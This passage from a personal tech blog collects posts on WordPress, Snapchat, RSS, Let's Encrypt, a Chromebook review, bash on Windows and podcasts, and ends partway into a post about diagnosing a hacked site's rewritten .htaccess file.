    Here is a nice interview with Matt, but I can also highly recommend his several appearances on the Tim Ferriss show (a podcast):

    Static blogs

    So it was a no-brainer when I had to pick a CMS for this blog. However I also like experimenting, and static site generators are all the rage right now and they certainly do have an appeal. And mainly for two reasons: speed and security. But WordPress is fast enough for my needs, so there goes that reason. And also WordPress itself is pretty rock solid. Most security problems are related to third party plugins, not the core. (I 💖 the auto-update feature that WordPress introduced in version 3.7). And lastly there are just so *many* great, free templates available for WordPress, that no static site generator could compete (yet). So, I’ll stick with WordPress, which is amazing!

    So here’s to Matt and Automattic 🥂. Thanks for keeping the web open, free and empowering the people!

  • Thoughts about the Snapchat IPO👻

    Last year I wrote about Snapchat and their unique approach to things. I’d like to think that my predictions at the end of that blog came true 😎. Why? Because we see Instagram betting big on streaming and disappearing video i.e. copying Snapchat features. If anything, it’s proof Snapchat is a force to be reckoned with. And they seem to be making Zuckerberg & co. nervous.

    So it’s not unexpected that the Snap Inc. IPO (their new name to separate the business from the app) is right around the corner. And their S1 filing offers some curious insights. Mostly about their technology.

    People like to make comparisons with the Facebook and Twitter IPO. Facebook as a good example, because Facebook is still growing and posting big numbers. Twitter as a bad example because Twitter is struggling a bit and has less overall users. For the sake of argument let’s compare it to Facebook.

    I’ve always been somewhat skeptical about Facebook, but I have been proven wrong time and time again. Firstly, if  you had asked me “will me people put their entire personal lives online without any reservation?”. I would have answered: no. I was wrong, of course. Secondly, when the Facebook IPO was coming up, I thought, surely it can’t be worth that much. I was wrong again. I have no problem being wrong, as long as I can learn something from it.

    And what I learned from this and what took me some time to realize, is Facebook is not about picture profiles. It’s about three other things:

    1. Facebook is, like Google, about selling ads. Yes, there is a lot of money in ads.
    2. Facebook was very smart in spending their IPO money. Among other things they bought WhatsApp: best app since sliced bread. And they bought Instagram: which in my opinion is best deal on the internet since Google bought YouTube.
    3. Facebook is a technology company, and this is very important. They, just like Google and Amazon, have been able to grow their business because of unique in-house developed technology. People don’t realize this enough, but you couldn’t just download a tool to index the entire the web and make it searchable. Or buy some software to connect 2 billion people together, or just get an of-the-shelf infrastructure where you can upload 300 million photos every day. You have had* to think up, create and develop the tools, infrastructure and everything around it (storage, computing etc.) yourself. And you needed this level of technology as an enabler for your service just as much as you needed it to provide the competitive advantage to stay ahead of the competitors. I’d argue that the technology was often the difference between success and failure. MySpace couldn’t keep up with Facebook. Just like Altavista and Yahoo couldn’t keep up with Google. And Google realized they couldn’t keep up with YouTube so they bought it. Amazon is another example. Sure, they sell books and everything else. But behind the scenes Amazon is a tech company that has developed a lot of technology to enable being the biggest online warehouse. (Amazon has been smart about this and the way I see it their AWS product basically started as rebranding in-house developed technology. Google is doing the same now with Google Cloud.)

    So back to Snap Inc. Number 1 is pretty clear, right? Even though I think targeting Snapchat users is harder than targeting Facebook or Google. I think they have less info on their users. But still, ads will be very good business for them.

    I can also see number 2 happening, getting a few billion dollars will enable you to buy other companies and breach out c.q. pivot. So this is probably what will happen. But number 3, this is where it gets interesting.

    From this post titled, “Snap commits $2 billion over 5 years for Google Cloud infrastructure” it became clear that Snap doesn’t have a lot of their own (infrastructure) technology. And also they are not planning on building it. So they depend on another company (Google!) for this.

    You can kind of guess the sort of responses to this. Hacker News, of course, has plenty of those.  And a lot of the reactions are more or less centered around “See, this is all just blowing smoke! They are not a real tech company, they are too dependent on Google! How will they ever be able to have a competitive advantage. etc.” This all seems to sound reasonable when you indeed compare Snap to Facebook. However, there are two reasons we shouldn’t do this.

    1. Snap is known for doing things differently. And this fits right in there. The only thing you can conclude from it is that I think it defines them as a service or media company as opposed to a tech company. And this is not necessarily a bad thing. Just, different. But a very important difference because comparing them with Facebook is like comparing apples and oranges. Apart from certain similarities it’s specifically this difference that makes both companies fundamentally different. Facebook is a tech company that gets its edge mainly because of the technology (the world has never seen such a huge interconnected network before). Snap is more of a media company, that gets its edge because of a different kind of user experience (Snaptacles anyone?).
    2. Another aspect is that (infrastructure) tech is becoming more ubiquitous. Yes, when Google, Facebook and Amazon started you needed to develop the tech yourself (*see above). But nowadays it’s much easier to buy/outsource critical infrastructure and focus on what you do best. And it’s clear Snap is doing just that. And this is a change from what we’re used to; that a web company needed to be a tech company. That the tech is what set you apart and you needed to own and control the whole tech stack. But nowadays you don’t need to own the whole stack you have to decide what tech you have to develop and what tech you can/need to outsource. And with Google and Amazon you can just rent complete data centers without having to patch one cable yourself. Things have changed.

    After the IPO the main focus for Snap will probably, still, be growth. So my guess is Snap will start buying companies. And you either buy technology to enable further growth, or buy (growing) communities with lots of users. I think Snap will focus on the latter and will start buying and creating different user/media experiences and grow from there. Because this is simply closest to what they are. They are not a classic “tech” company and they know this. However, they could still buy and try to become a more real tech company. They have the cash, but it would surprise me because it’s different from what they are or do. Either way, I am not betting against them. I have been wrong too often to do so.

  • I still love RSS (you can too!)

    RSS. It’s kind of a weird acronym and people can’t even seem to agree on the true meaning behind those three letters. It doesn’t sound too sexy, but it does sort of have a recognisable logo. If you have seen this logo before and wondered what it is, well, this post is for you!

    TL:DR: RSS is a specification that will allow you to keep track of all your favourite sites in one place.

    RSS has been around quite some time, long enough for people to try and kill it. But RSS is still around and one of the main pieces of technology that make the web great. It’s easy and simple and you can use it too!

    Forget the name for a minute. Say you like certain sites, you could check the site every hour for updates. But you will find that most times there isn’t anything new. Wouldn’t it be great if you could go to one place that will tell which of your favourite sites have updates?

    Well this is what RSS can do for you! How?! Glad you asked!

    Behind the scenes

    Most sites look different, some have the news at the top, some on the left, some have pictures that you have to click. This is great, every site has its own unique identity. But let’s think about this for a second: no matter where the news is or how you get there, in the end most if it is just text. You know, words, sentences, things you can read! As you are doing right now. What if this text from all your favourite sites  is organised and presented in a uniform matter? When every site abides the same rules, it would make it easier to fetch and present this content, right?

    Well, RSS is just that, it is a specification how a website, news site or blog (or anything that creates content, even podcasts) can offer their content. Technically, this content is in XML format, but you can forget that right away. What’s important here is that because sites agree on a specification, it makes it possible for a tool to read these XML files and present the updates to you. Pretty much like an e-mail program, all your new e-mail is in one place for you to check. Or like a Twitter feed, you don’t check people’s individual Twitter pages for updates, you have a feed, that is a reverse chronological collection of all updates of people you follow. So think of RSS as a way to get one chronological timeline of updates for all your favourite sites.

    RSS readers

    Sounds great! I want such a tool!

    Awesome! Well there are a whole bunch of tools available. Because RSS is an open format, there are 1001 and more implementations. You can get RSS readers for your phone, desktop computer or use a website (self-hosted or not). I myself use theoldreader.com, I added a bunch of sites and theoldreader.com will periodically check those sites for updates. So I don’t have to visit the sites myself, I just visit one site (theoldreader.com) and it presents me the updates. At the moment I follow around ~100 sites this way. Imagine having to check 100 sites everyday! Now I just get the updates for all of them in one place.

    Looks a bit like this.

    I find it especially great for blogs or sites that don’t update that often. My most favourite/visited sites aren’t even in there because I visit them often enough or they have too much content anyway. I’m looking for the news pearls, things that might not be in the main news, or great bloggers that don’t update frequently.

    So if RSS is so great, then why…?

    I know what you’re about to ask. But nobody owns RSS. Not Facebook or Google or Apple. It is just a agreement of presenting your content. And most sites really do offer their content in this RSS format, and refer to it as a RSS feed. You can usually find it by clicking the orange logo but most RSS readers will automatically find the feed for you. (You might also notice RSS2, RDF or Atom feeds, for now you can think of it as the same thing). It comes standard with almost all CMS’s. So if you write a WordPress, Joomla or Drupal blog or even a Tumblr, you might not even know it, but your content is already available in RSS. For instance this is the feed for this site. You would probably have to explicitly disable it if you really don’t want it. But why would you want to do that, RSS is such a great way for people to keep track of your site, right?

    But here’s the thing, most sites actually want you to visit, so you they can show you ads. Left, right on the top and bottom of the content you are there to read. And (therefore) most sites want as many visitors as possible. When you read their content somewhere else, this means no visitors and no ad clicks. So offering an RSS feed can conflict with their business model. So some sites let their RSS feed just offer titles, and you still have to click to get to the main site, or some embed ads in the RSS content. But even so most just offer the article/update and you never have to visit the site. If your goal is getting your content out there RSS works perfectly, it makes the web more decentralised (always a good thing). But if your goal is showing ads and generating a lot of traffic it might be a conflict of interest.

    Sites like Facebook never want you to leave, all news and content is on their site. It’s their bread & butter. But even they offer (limited) ways to present/create RSS feeds.

    So, RSS is amazing, even though it might sometimes conflict with a site’s interest. I understand, and I am not advocating solutions here. I’m just here to promote RSS, I love it, always have. And I know so many people that don’t know what it is, so I hope this helps!

  • Let’s encrypt all the things!

    You may notice something different on your favourite blog. Left of the URL in the address bar there is a little green lock! This means piks.nl is now served to you via SSL/TLS. You know, https:// instead of http://. This means the connection, and therefore, traffic between you and the website is more secure, because it is encrypted.

    This was way overdue, even more so because it’s oh so easy now with Let’s Encrypt.

    Let’s Encrypt

    Let’s Encrypt offers free and automatically renewable SSL/TLS certificates for everyone. Using certificates has been around a long time, and are part of a secure internet but 4 things were always a hassle:

    1. Certificates cost money.
    2. Certificates expire and renewal is something you have to plan/take care of. It’s not automatic.
    3. Validation is a bit of a pain (sending and replying specific emails)
    4. Configuration is a lot of pain (webserver dependent, a lot of different files, creating, moving copying etc.)

    Let’s Encrypt solves all of these problems. 

    I also run a couple of webshops so having certificates was kind of a big deal. And I had the first certificate running in 15 minutes. Pretty neat! I should have done this earlier.

    What makes it so easy is mainly because of this great tool that Let’s Encrypt provides: certbot.

    This bot takes care of (automates!) all the steps — there is always a manual override if you’re that kind of person. You download the bot, you unpack it, you run it, follow the configuration steps and the bot will create certificates and even update your Apache (webserver) configuration and reload the webserver and you’re done. You have to do very little.

    After that you can set your cron/systemd config to automatically renew the certificates for you. Certificates expire, that’s sort of part of what makes them secure.

    What more can you ask for?

    So what?

    Why would I need this? Well, 2 reasons:

    1. As said, I also run a couple of webshops. Having your customers send their personal/order/account/credit card information over an unsecured connection is not really something you want in 2017 (or, you know, ever).  Sure, a blog doesn’t typically handle customer information, but it’s still relevant. Also, because:
    2. Google will start (or already is) ranking SSL/TLS sites higher. So you need this if you want your site to show up in Google. SEO baby!

    So having a certificate is not only more secure but it’s also a sort of a quality stamp for your site.

    Why should I trust Let’s Encrypt?

    You don’t. You can still buy and manage certificates from regular SSL providers. No problem. If you’re sceptical about LE, you can read a little bit about them here or here. But I highly recommend it.

  • Best of 2016

    Best-of lists signify another year is coming to a close. People feel a need to sort and order things to make room for what is to come. Or something like that.

    So here is an assorted list of best new things I found in 2016. Things can be anything, as long as it was new to me in 2016. Feel free to share your list in the comments.

    Best new app

    Google Photos turned out to be a real improvement in photo management. It saves space on your phone and, more importantly, you can search trough photos because Google AI indexes them (and every face on it) for you. Picture of that meeting last month? Coming up! Picture of your kid on a swing? Say no more fam, I got you. You should give it a try, it works pretty great. (Be sure to read the T&C if you have privacy doubts).

    https://www.youtube.com/watch?v=aEK37MBTUPk

    Best new podcast

    I have listened to 316 podcasts this year. I ain’t lying, it was kind of my thing this year, I even started my own podcast with a friend.

    But apart from that, the “How I built this” podcast is hands-down the best new podcast I found this year. Every episode is interesting. No duds so far. It’s always a great story of one or more entrepreneurs on how they got started. And there has been a wonderful selection of guests already. This show is fun and you really learn something every time (but learning is fun ammirite?!).

    Best new music

    Usually I compile a list of best new music discoveries. I might still do that. But for now I’d like to point out one genre, that was newish to me: Dark Wave. Taking new wave a bit further. Not for everyone, I know.

    Best book

    Even though I just started this one and so I haven’t finished it yet, I still think Shoe Dog: A Memoir by the Creator of Nike will be my favourite book of 2016. Boy, this is something else. And right up my alley, life-lessons, entrepreneurship, sports, passion. It speaks to me. You learn something, you feel you understand things better after reading. At least so far, I might blog about it after finishing (or you know, podcast about it)

    Best game

    Probably Sniper Elite III. I only played a few games this year, but this one was fun. Sneaking and sniping Nazis in the African desert. Not too much backstory or immersion, just what I like for now.

    Best movie

    The Big Short. A piece of recent real history portrait by great actors. Yes, in a Hollywood fictional sort of way, but that didn’t bother me.

    TV shows are missing from this list, because there just weren’t any that I think I’d like to recommend. But I have seen more episodes of Flip or Flop than you would guess. Probably because we bought a new house ourselves and did some work on it.

     Best article/site

    Not so much an article, as a guy who writes them. I think I must have stumbled on Derek Sivers and his braindump sivers.org a few times already before 2106, but it didn’t stick or I didn’t see the bigger picture. But this year it did, you can really learn a lot from this guy, who built and sold his company and didn’t keep a penny. He writes interesting articles, some have been compiled to read as a book. Highly recommended.

    (That reminds me, I probably also should start tracking favourite quotes.)

    Best video

    I watch and like a lot of YouTube but I have never liked (you know, like-like) a youtube video in my life. So picking one is hard because there is no log.  So this is a placeholder for myself to keep track of this. The same goes for gifs, also moving images. I probably have seen more gifs than videos, and that’s saying something 😉

    Best new gadget

    My Chromebook. I did a blogpost on it. But my Tascam DR-40 and Logitech MX Master are close runners up. Oh and I started driving one of these, which is also a nice piece of technology.

    Best tweet

    For this last one, I’m going to be unapologetically selfish. Yes, with all the political drama this year there were a lot of interesting or funny tweets. But this tweet is mine, non-political and my favourite:

  • My Chromebook Acer C730E-C480 review

    Last week Google was kind enough to provide me a Chromebook. I had been eyeing one for some time, but I had no reason why I would need one. I have a laptop, smartphone and a tablet. So what would a Chromebook add? Well, now I know.

    TL;DR: I love the Chromebook!

    The good

    Reasons are actually pretty obvious. It is a laptop but it is light, small, cool, quiet and has incredible battery life! Especially the last aspect is a main selling point for me. Also, I am a laptop guy. I need to Alt-Tab, Ctrl-T, CTRL-W and use ESC to feel productive and preferably on a physical keyboard. This is why a smartphone and tablet always feel like a second best thing to me. I use those when I can’t use my laptop. But my laptop is more heavy and I need to carry a power supply with me (mind you I’m talking about Dell and Lenovo, Macbook Air users probably have different mileage). With this Chromebook I only needed to plug in it once, in three days! So it felt like using a laptop but with smartphone battery life. Also the instant sleep on close and instant on function is something I really love.

    There are enough USB ports, a SD card reader, HDMI output and a 3,5 inch jack.

    Apart from that it is fast enough and I can do about 95% of everything I normally do on a laptop. Most things are done in the browser anyway. And there even is a ssh clientwhich makes it even better.

    https://www.youtube.com/watch?v=e_C5MkmJq4E

    The less good

    The trackpad is probably the worst part of this laptop Edit: actually after a week or so, and figuring out 2 and 3 finger mouse gestures, it is actually pretty amazing.

    But, see above, I am a keyboard user. And the keyboard is OK, I do miss keyboard back-light though. And yes the screen could be a bit bigger, but that is always the case, for every laptop I have ever owned. It did crash on me once, but I might not be a typical user. I did have to google how to reboot it though.

    Editing a document (in Office and not Google Docs), using GIMP, downloading torrents, or editing podcasts is not possible.  There is a file browser but it doesn’t really allow for external programs to edit files. So it is very much a tool for consumption, less for creation. Unless, that is, of course, writing blog posts 😉

    The worst part is probably that without Wi-Fi it becomes pretty much unusable. But what do you expect?

    Note: I understand very well how Google tries to push the user and their data into using their ecosystem (mail, docs, storage etc.) but if you know what you’re doing it’s fine and you are not limited by it. The Chromebook is the culmination of everything Google is trying to do. From a browser (Chrome!), to Office in the cloud, to Google Music to Google Hangouts to Google Photos and more. The Chromebook ties it all together.

    Conclusion

    The first thing I googled when I got it, was how to put Linux on it. But that seemed not that trivial so I thought let’s give it a shot. And here is the thing, I have not used or even opened my real laptop since I got the Chromebook. This is huge. I get it now.

    The Chromebook is an eye-opener for what I actually use/value/need from a computer.

    For me that is a physical keyboard, a browser, a ssh client and a lot of battery life. This is probably the first computer I own where I don’t know the CPU or amount of RAM. So things change. And a Chromebook might be just the right kind of change.

  • Snapchat

    Snapchat is everywhere these days. And with everywhere, I mean a lot of people are talking about it like it’s some sort of elusive enigma only the young kids are able to tune in to. The digital equivalent of high pitched notes.

    What makes it so hard to grasp, what’s different about it and what’s important about it. Let’s dissect, shall we.

    Different

    Snapchat is unlike any other application that you’re familiar with. Even though most applications you use wouldn’t make sense to someone 15 years ago, your mind has already been trained to expect certain comparable things from modern social web applications. Call it a context. And when using Snapchat this context is missing. Because it is simply not there:

    • There are no number of likes
    • There are no number of views/loops/retweets
    • There are no number following/friends/followers
    • There is no record of older posts (snaps)

    So everything you have created or accumulated is not important. Snapchat does keep certain scores. But that’s not the main focus. The main theme with Snapchat is that, everything will disappear. What is important, and the only thing that matters, is capturing, sharing and being in the moment. No other app as such a strong emphasis on the now.

    The other thing that makes Snapchat different is: content creation. The app is very serious about this. The very first thing you will see when opening the app is the camera for making a snap. You can swipe right to see personal snaps from friends or left for stories. But you cannot make either of these your default start screen. Snapchat wants you, invites you, forces you, begs you, facilitates you to create and participate. No other app does this so explicitly.

    Background

    My first Snapchat experience was a couple of teenage relatives who would take my picture, draw something inappropriate on it, send it to each other and have the best time. Curious!

    Around that same time, in 2013, I watched the founders of Snapchat explain their app on the Colbert Report and I was intrigued. And not because, let’s be honest here, this was a sexting app (or at least a very naughty app). Disappearing photos?  You know what’s up. So I could see why this would be popular for dubious reasons. But, my intrigue was triggered because of a technical aspect. These guys didn’t have to store anything! Until then having a popular social web app meant having big storage. And unlike Facebook, flickr, Instagram, YouTube, Vine, Tumblr that have to store costly petabytes of photos and videos, these guys seemingly found a way around this. Respectable!

    But at that point, aside from using it for sending explicit pics, I just couldn’t get why you would want to take a decent picture send it to a friend and have it disappear. Maybe this was something only young kids understand, but why?

    Youth

    A lot is being said about the app’s specific appeal to teenagers/young people that have no interest in Facebook or Twitter. Because they identify these platforms as something for old people (i.e. uncool) and Snapchat is not. So they seem to get it, where everyone else has a hard time understanding it. But I think there are 4 reasons why Snapchat would appeal to this specific group in the first place.

    Because I am not a teenager and because I grew up in a time before the internet my mind works differently than that of a teenager. For me a photo has value, whether it is digital or not. Because I can remember the first digital cameras, and I remember before that, that taking pictures with the family was a thing you dressed up for. So to me, photos mean something, and you cherish photos. But, say you are born in 2000-something. Knowing that the iPhone came out in 2007, that means you have never really lived in a world without an abundance of digital photos. Photos are easy and everywhere, so to you they are not important keepsakes. Reason 1.

    Because Snapchat doesn’t keep track, so you can’t really tell how popular you or anybody else is. It’s low pressure. There are no numbers to keep up with. The popularity contest that dominates every other aspect of teenage life is eliminated. Anyone can join. Reason 2.

    Snapchat is about NOW. The moment. Who cares what you did last week? Where are you now, what are you doing, who are you hanging out with, whose party are you at, what friends are you having over. That is the only thing that matters. And for a demographic who are mainly preoccupied discovering their own identity based on what other people/friends are doing now this is key. Reason 3.

    Snapchat’s interface is often the main thing people don’t understand. It causes confusion. But as stated earlier, this is because people have come to expect a certain context that is just not there. But as cryptic the interface might seem, after you grasp it, Snapchat has one of the best interfaces around for creating content. This can not be emphasized enough. No computers, no difficult editing program. Right there in the app: edit, add, caption, draw, create, make it your own creation. Super easy fun and fast. Reason 4.

    And on top of these 4 reasons, the sneakiness that goes with disappearing photos probably also contributed to the success in the beginning. However, Snapchat is not the app it used to be and people of all ages are coming to Snapchat now.

    Pivoting

    Snapchat started out as an one-on-one/one-to-many photo messaging app for disappearing photos that felt personal. This was the first two years or so. But the most brilliant move they made is that they were able to see the possibility and pivot to a new use of snaps with stories. And the app completely changed with this.

    Stories are publicly available snaps (videos or photos) concatenated together for a maximum of 24 hours. Creators can keep adding snaps to their story and the interface facilitates very nicely that you can pick up where they left of. It is near-real-time video for everyone, not just one-on-one.

    And stories are mainly where everything is happening now. YouTube, Vine and Instagram stars are flocking to Snapchat for this reason. Content creation is easy and fun, no editing, no uploading, just snapping. And viewing, keeping track of someone’s story is also easy (and a lot of stories are videos). Following these stories have a unique, personal and real feel to it. I follow a bunch of VC and tech guys that give advice on companies, startups, failing, building teams all that stuff and it’s like they’re talking directly to you unedited, unscripted. And you can directly interact with them (snap them). So it’s much more engaging and a rather different experience from YouTube or even a podcast (which comes close, but isn’t visual or near real time). You are in the moment with them.

    It could have hardly been a planned move from the get go for Snapchat to implement stories so I give them credit for being able to pivot like this from one-on-one disappearing photos to a near-real-time streaming video platform.

    What’s next

    I see a lot of Instagram, YouTube and Vine stars moving to Snapchat. And because of that, Snapchat is snowballing hard into the mainstream. And because more and more people are seeing the fun or benefit in sharing realtime photos/videos and being in the moment. In that sense Snapchat is inching closer to the human experience, real-time unedited conversations. You know, like when you talk to people.

    Also something I figured out recently: Snapchat is basically closer to early radio and television than it is to Facebook or YouTube. Tune in, listen and/or watch. And if you don’t, it’s gone. It has a much more ethereal feel to it. So from that viewpoint it seems we’re coming full circle.

    Snapchat itself is of course doing well. Money and seemingly crazy or even crazier valuations are being thrown at them like you’d expect for a popular app. And they’re spending like you would expect also. And even though they seem to have a business model with the Discover tab (basically paid stories by brands) it is not generating that much at the moment. But they probably don’t mind too much and are 100% focused on growing their user base. As long as you can keep that up, VC money will flow.

    But what is important here is that real-time video is one of the most fascinating developments on the internet right now (next to AI and VR). Periscope, Meerkat, Kamcord, Twitch and YouTube are also gearing up and trying to take some of the pie here. And it wouldn’t surprise me if Facebook starts introducing the option to have posts available for only a certain amount of time or concatenate (video) posts. So interesting developments, to say the least! And I will keep following these developments because after all, this is not about Snapchat, this is about the human race bending technology to fit human needs.

  • Ubuntu on Windows

    Today’s big news is that Microsoft has made bash available on Windows 10. No container, no virtual machine, no recompiled sources:

    Here, we’re talking about bit-for-bit, checksum-for-checksum Ubuntu ELF binaries running directly in Windows.

    This opens up a world of possibilities. A world also previously within reach alas be it with lesser solutions.

    This means being able to use awk, grep, find, vim, wget, ls, git(!), package management and everything that is awesome and sane, from within Windows 10 natively. Sounds pretty sweet, right?

    I’m guessing this will be pretty hugely successful (and make a whole bunch of other tools obsolete). A big part of the greatness and goodness from working with a GNU/Linux system has been ripped out and made available on Windows. There are *a lot* of people working with git and Visual Studio that will cry tears of joy. Because, let’s face it, that’s one of the main reasons for this move. But that is just one subset of users, there are so many more that will discover the (real) power of the command line and the power of package management that comes with it (that might even be the real benefit). So Microsoft improves the usability of Windows and while doing so casually punches Apple’s Mac OSX in the face. OSX is partly regarded/respected as great developer OS mainly because it has a shell.

    So a lot of people seem excited, but a bunch of people closely related to GNU/Linux aren’t that vocal (yet). Or maybe they’re unfazed, uninterested?

    Maybe it’s because this whole thing raises the question: what does this mean for free and open source software and GNU/Linux in particular? (This was supposed to be the year of the DESKTOP LINUX!)

    There are roughly two ways to differently phrase what has happened:

    1. “A multi-billion dollar corporation with almost an omnipresence on the desktop computer, notices it’s missing something that is readily available with other competing solutions, and decides to nitpick the greatest parts of those competitors and incorporate it in their own solution. If you can’t beat ’em join ’em strategy.”
    2. “Computing and software is becoming more fluid, and an OS doesn’t have the clear boundaries it used to have but it is just made up of whatever the best ideas are, ideas that are expressed by software and thus interconnect via API’s and can be glued together to make the best possible solution to fit your needs. And that big multi-billion dollar company wants the best solution.”

    If you like that last idea, I have news for you. This is exactly the idea behind GNU/Linux, and it already exists. So my guess is that the GNU/Linux community seems unfazed because they think: instead of being excited and giddy for all this you could just install Ubuntu.

    And this is where the sticky part is. The openness of GPL software makes way for their current Microsoft approach, but it also bites itself in the butt. By using bash in such a way and incorporating this Free and Open software within this closed OS is suffocating the ideas of GPL and diluting its purpose. Because Microsoft is not GPL-ing/open-sourcing its own code base (sure, small parts), it’s just using the best parts and sticking to its own strategy. It’s a smart, clever, and tactically strong move and it will be very successful. But GPL thrives and exists because of other GPL software, and this approach works and creates beautiful things (take for instance how GCC made may for Linux, which made way for a gazillion other tools etc.). There is a viral aspect to the GPL that will be completely cut off. GPL software in a non-GPL environment has  a harder time in reaching its potential.

    It strikes me as the people that are excited might not really understand or care for the GPL (or licensing in general). They just look at it from a user perspective and think: “hey, I get best of both worlds”. That’s fine and I’m not arguing against that (software is made for the users after all). But a critical aspect here is that they seem to forget that this software only got this far because of exactly this license. It’s a fundamental and integral part of it’s success and quality.

    Since what just happened was completely unheard throughout the 90’s and 00’s I don’t think both sides would have guessed this would ever happen. But it did. Just like a couple of weeks ago Microsoft decided to create its own Linux version to support SQL server on Linux. So even stranger things might happen and I’m trying to keep an open mind. I’m not against this current move and probably will even use it myself at some point, but if this is it, and its just taking and not giving, this will not benefit GNU software in the long run.

    Personally, I really think the nature of software is and should be fluid and so it should be able to be stitched together to create what you need. But this only works really well, if all parts of the ‘quilt’ follow the same rules.

  • My Favorite Podcasts

    So you read the previous post and now you’re wondering what podcasts to listen to. Well you’re in luck, because this post will tell you.

    What’s to like?

    But first, why listen to podcasts anyway? Sure enough, it might not be for everyone. But if you don’t mind listening to people talking, you should be alright. I myself, am a pretty big (public) talk radio fan. Mostly because public radio doesn’t play my type of music anyway, but also because I like listening to people discussing things. And there are, of course, a lot of similarities between talk radio and podcasts. But for now I seem to like podcasts better:

    • Podcasts are a bit more relaxed. Radio is usually all over the place, hopping from one item to the next caller, shifting between Syria and the economic crises right before going to the news, but not before commercials. Podcasts have more focus.
    • Radio is a drop-in experience. Whatever they were already talking about they will keep talking and you’re more of a bystander. Podcast are more immersive and you can get the complete picture.
    • Radio decides what they talk about. I admit that this can generally be a good thing because you will be exposed to otherwise different subjects/opinions. But (see the first point) to keep things interesting radio hardly “goes deep’ and tends to hop from subject to subject. Podcasts create more depth.
    • Because of this focus on one or a couple of subjects you can really learn something. Podcast will make you smarter!

    There are tons of podcasts out there. Pick any subject you’d like, there is a probably a podcast about it. With podcasts being an internet thing it is no coincidence that a lot of podcasts are about (internet) technology. That is just fine by me though

    Two types

    I my mind there are 2 types of podcasts. On one side you have 2 or more people talking off the cuff about loosely predefined subjects. Usually recorded in one go. These podcasts tend to more topical. And therefore make less sense to listen to much later, because the subject matter might be outdated by then.

    And on the other side are the shows that deal with one specific subject, question or theme. They usually have soundbites, interview parts and try to answer questions. These shows are much more timeless (for lack of a better word). So I will break my favorites down in these two categories.

    Topical

    AppelsenPeren

     

    Disclaimer: This one is Dutch. It was one of the first ones I started listening to and it’s also one of my favorites. Because they a have broad theme: anything future related. Of course this means a lot of Apple and Elon Musk. But that is just fine. So, the content appeals but also it is similar to discussions I have with friends: topic wise and also mood wise. Couple of guys geeking out. Highly recommended.

     

    ATP

     

    ATP (Accidental Tech Podcast) is perhaps one of the more famous podcasts. Featuring podcasts heavyweights: Marco Arment and John Siracusa. Accompanied by Casey Liss. Lots of Apple related tech talk.

    Around 1,5-2 hours (with a fun outro jingle).

     

     

     

    Timeless

    Freakonmics

     

     

    The Freakonomics podcast is hosted by one of the writers of one of my favorite books with the same name. It deals with lots of different subjects and tries to show the hidden side of things. Something I always really like.

     

     

    UnderTheRadar

     

    Under the Radar is relatively new podcast with (yet again) Marco Arment and David Smith. Two independent Apple app developers that discuss everything that they come across while developing apps.

    No longer than 30 minutes.

     

     

    mckinsey

     

    Up next is also a new podcast. The McKinsey podcast. This one holds the distinction of the only podcast I saved after listening. It was their first one, about innovation, it has terrible sound quality but it’s about an extremely interesting subject.

     

     

     

    99invisible

    99% Invisible is in my top three favorite podcasts. It says it is about architecture, but I hardly notice this. Because it’s about a lot of different things. The history of drinking fountains, the game monopoly, or the strange history of the worst smell in the world (from gimmick to invaluable tool). Also about the hidden side of things (hence the name, I think).

    Recorded in beautiful downtown Oakland, California

     

    planetmoney

     

    Planet Money: I  would argue that this is probably my favorite podcast. The name sounds a bit boring but you will learn something and come away smarter, everytime. It shares the hallmark of 99% and Freakonomics in trying to show you the  different side of things. Subject matter is diverse, it is the right length (one car drive long) and I’ve never heard a boring one.

     

    Runners up are: This American Life (fun, but long), Inquisitive (favorite albums, depends on the album), Serial (just started, very good so far). I tend to like the shorter podcasts better (e.g. The Talk Show and The Incomparable. I’ve listened to a few of them but  they are way too long for my  taste).

    Bonus: just recently I started to keep track of the podcasts I’ve listened to.

    So there you go! Question remains, what is your favorite podcast?

  • Podcast Renaissance

    ren·ais·sance (rĕn′ĭ-säns′, -zäns′, rĭ-nā′səns)
    1. A rebirth or revival.
    2. A situation or period of time when there is a new interest in something that has not been popular in a long time.

    Podcasts have been around for years. I never really had a particular interest in them. I mean, it’s literally an MP3 of people talking. How hard is that? That can’t be very interesting. So in my memory, podcasts went as quickly as they came. But in fact, they never went away.
    Instead, there is an entire online subculture where podcast quality and interest in podcasts is steadily growing. And so this year a funny thing happened; there were several occasions where people started pointing me to interesting podcasts. When things like that happen, I take notice. And over the last months podcasts have become a very rich and enjoyable medium for me (more on that in a later post).

    Maybe I have been living under a rock, and you have always been aware of podcasts and their value. And I was just blind. But I don’t think that is the case. It seems podcasts are becoming increasingly more popular. And it feels as if we are entering an age of podcast renaissance and “Big Money” is coming.

    https://twitter.com/marcoarment/status/653963266000031748

    Of course Marco Arment is one of the most well-known podcasters. He produces several podcasts and is pushing the medium forward by creating a podcast app: Overcast.

    Although this is a general consensus in his show, shared by other well known podcasters, you don’t have to take his word for it. Because there are other signs too. These are things I noticed:

    • The Serial podcast from 2014 really broke new ground in what the medium can do. This is also one of the podcasts people kept pointing me to. I think Serial opened up the world of podcasting for a lot of people.
    • Mainstream media like SNL are doing skits about podcasts.
    • Ted.com, the well-known platform for inspiring talks are inviting podcasters to do a live recording of a podcast in front of an audience, that they film (?) an put online.
    • Established authorities like McKinsey are starting new podcasts.
    • New podcast networks like RelayFM (from 2014) keep adding more and more quality shows and developing a business model around podcasting.
    • Sites like Podcast Chart are started.

    So things are brewing at the surface. And there is a sense that things might change real soon. And I’m curious to see what happens.

    Of course one of the great things of podcasting is that it is a completely decentralized medium. You can grab your podcast straight from a website or from Soundcloud, or via RSS, or the iPhone app, or the Overcast app or maybe someone sends you a Dropbox link. It’s just an MP3 right? Nobody owns podcasts or podcasting.

    https://twitter.com/marcoarment/status/649332852711145472

    So it’s definitely not like YouTube where the vlogging revolution started, with everything in one place. So it will be interesting to see where this can go. Can a decentralized medium really take off or are we already at peak-podcast?

    (In my next post I will discuss what’s to like about podcasts and which are my favorite ones.)

  • How this site got hacked

    (This is a crosspost from my other blog, that actually got hacked. This is for you, a Google search user, struggling with a hacked website).

    Last week I noticed some strange behaviour on my site. When clicking a link on the front page I would be redirected to the same front page, effectively rendering my site useless.

    What was going on?

    I quickly noticed my .htaccess was causing the problem. It was redirecting wrong. Strange. But just a little mix-up I thought. A quick change to the .htaccess file will fix that. However, after the fix it would work exactly one time!

    Uh?!

    Something was rewriting my .htacces file on the fly (specifically, with the first click). But what and why. To figure this out I changed the permissions on my .htaccess file.

    chown root.root .htaccess

